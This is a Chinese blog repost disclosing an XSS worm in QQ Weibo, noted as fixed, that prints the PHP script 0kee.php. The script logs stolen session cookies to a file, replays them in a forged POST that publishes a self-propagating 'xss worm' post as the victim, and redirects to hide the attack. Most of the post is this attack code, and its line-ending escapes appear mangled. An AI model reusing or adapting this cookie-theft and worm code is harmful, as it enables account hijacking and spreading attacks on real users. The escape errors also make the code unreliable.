update(8.29): 已修复
发视频处插如下代码:
http://www.tudou.com/programs/view/TLpmMpTY0eY/">
0kee.php的作用是窃取cookie、伪造阅览者身份发一个blog、跳转到一个正常的日志,代码如下:
ob_start();
$url = 't.qq.com';
$cookie=$_GET['cookie'];
$randnum=rand();
$cookie1=$cookie."rnrn";
fputs(fopen('a.txt','a+'),$cookie1);
$sock = fsockopen("$url", 80, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)n");
$data = "content=http://url.cn/1FDpEd hacked!! xss worm test~~".$randnum."&pic=&countType=&viewModel=1";
fwrite($sock, "POST http://$url/publish.php HTTP/1.1rn");
fwrite($sock, "Accept: */*rn");
fwrite($sock, "Referer: http://0kee.comrn");
fwrite($sock, "Accept-Language: zh-cnrn");
fwrite($sock, "Content-Type: application/x-www-form-urlencodedrn");
fwrite($sock, "Accept-Encoding: gzip, deflatern");
fwrite($sock, "User-Agent: Mozillarn");
fwrite($sock, "Host: $urlrn");
fwrite($sock, "Content-Length: ".strlen($data)."rn");
fwrite($sock, "Connection: Keep-Alivern");
fwrite($sock, "Cache-Control: no-cachern");
fwrite($sock, "Cookie:".$cookie."rnrn");
fwrite($sock, $data);
$headers = "";
while ($str = trim(fgets($sock, 4096)))
$headers .= "$strn";
echo "n";
$body = "";
while (!feof($sock))
$body .= fgets($sock, 4096);
fclose($sock);
Header("Location: http://t.qq.com/txsser");
ob_end_flush();
?>
文章来源于lcx.cc:【漏洞】QQ微博XSS WORM一枚
相关推荐: Html使用Img图片和 Java 脚本对网站进行测速
测试你到百度的速度 Html 使用 Img 图片和 Java 脚本对网站进行测速: 原理很简单,就是利用Img标签下载指定网站的首页数据(虽然首页不是图片,但是img标签也是会下载完整的页面和html源码,只是显示个叉叉,正是利用img标签这一特性,实…
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论